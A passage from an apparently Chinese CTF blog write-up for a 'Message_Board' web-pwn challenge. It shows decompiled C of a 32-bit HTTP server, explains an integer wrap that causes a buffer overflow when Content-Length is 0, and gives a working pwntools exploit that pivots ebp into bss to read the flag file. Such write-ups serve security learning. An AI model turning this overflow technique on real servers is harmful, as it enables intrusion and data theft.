&#123;</span><br><span class="line">      sub_8048A43(stdout);</span><br><span class="line">      exit(-1);</span><br><span class="line">    &#125;</span><br><span class="line">    ++src;                                      // 头部 ： 后的内容</span><br><span class="line">    *v10 = 0;</span><br><span class="line">    v10[1] = 0;</span><br><span class="line">    strncpy(v7, src, 0x200u);</span><br><span class="line">    v6 = (char *)calloc(0x248u, 1u);</span><br><span class="line">    strncpy(v6, dest, 0x40u);</span><br><span class="line">    strncpy(v6 + 0x41, v7, 0x200u);</span><br><span class="line">    *((_DWORD *)v6 + 0x91) = 0;</span><br><span class="line">    if ( v14 )</span><br><span class="line">      *((_DWORD *)v14 + 0x91) = v6;</span><br><span class="line">    else</span><br><span class="line">      v5 = v6;</span><br><span class="line">    v14 = v6;</span><br><span class="line">    src = v10 + 2;</span><br><span class="line">  &#125;</span><br><span class="line">  free(dest);</span><br><span class="line">  free(v7);</span><br><span class="line">  sub_804906C(s);</span><br><span class="line">  fflush(stdout);</span><br><span class="line">  fclose(stdin);</span><br><span class="line">  return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>漏洞函数在<code>sub_904906c</code>中,如果请求方式是<code>POST</code>且文件路径是<code>/submit</code>的话第三组就得是<code>Cookie: </code>,且内容的格式必须是Username=aaa;Messages=aaa\r\n </p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112185138828.png" alt="image-20220112185138828"></p>
<p>每个头部的内容都会被存入bss段中。当<code>Content-Length</code>的内容是0时，如果Messages的内容的末尾没有‘|‘，那么n就会变为0xffffffff，因此就会造成溢出。</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112185443327.png" alt="image-20220112185443327"></p>
<p>由于无法泄露地址，因此我们直接利用下图函数，来直接读取文件。</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112191241152.png" alt="image-20220112191241152"></p>
<p>因为是32位程序，所以参数是在栈内，又没有开canary和pie，因此在bss段上布置上文件名，将ebp改为对应的bss地址，就可以读取flag了。</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112191729899.png" alt="image-20220112191729899"></p>
<p>exp:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">io=process(&#x27;./httpd&#x27;)</span><br><span class="line">#io=remote(&#x27;node4.buuoj.cn&#x27;,25119)</span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">payload=&#x27;POST /submit HTTP/1.1\r\nContent-Length: 0\r\nCookie: Username=f1ag;Messages=flag\r\n\r\n&#x27;</span><br><span class="line">io.sendline(payload)</span><br><span class="line">payload=&#x27;a&#x27;*(0x82e-14+8)+p32(0x804C180+0x42c+len(&#x27;Cookie: Username=f1ag;Messages=&#x27;))+p32(0x80492BD)#+p32(0x8049339)</span><br><span class="line">payload=payload.ljust(0x5000,&#x27;\x00&#x27;)</span><br><span class="line">#gdb.attach(io)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/09/%E9%95%BF%E5%AE%89%E6%88%98%E7%96%ABpwn/" rel="prev" title="长安战疫pwn">
      <i class="fa fa-chevron-left"></i> 长安战疫pwn
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/01/19/%E5%BC%82%E6%9E%84pwn%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="next" title="异构pwn学习记录">
      异构pwn学习记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#webpwn%E5%88%9D%E6%8E%A2"><span class="nav-number">1.</span> <span class="nav-text">webpwn初探</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81%E5%AE%89%E6%B4%B5final"><span class="nav-number">2.</span> <span class="nav-text">1、安洵final</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81ciscn2021final-Message-Board"><span class="nav-number">3.</span> <span class="nav-text">2、ciscn2021final Message_Board</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ABf1ag</p>
  <div class="site-description" itemprop="description">CTF to learn,not learn to CTF</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ABf1ag</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
